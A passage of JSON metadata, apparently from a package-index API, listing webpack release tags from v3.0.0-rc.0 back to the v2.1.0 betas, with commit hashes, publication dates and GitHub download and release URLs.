0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v3.0.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v3.0.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v3.0.0-rc.0/manifests"},{"name":"v2.6.1","sha":"7cfd2c490ea96c9676e8de54f2e7b6d1214722da","kind":"tag","published_at":"2017-05-25T11:16:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.1/manifests"},{"name":"v2.6.0","sha":"af05c147f24d3e7ee62e0c4102bb32c55e73b8d7","kind":"tag","published_at":"2017-05-22T20:38:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.6.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.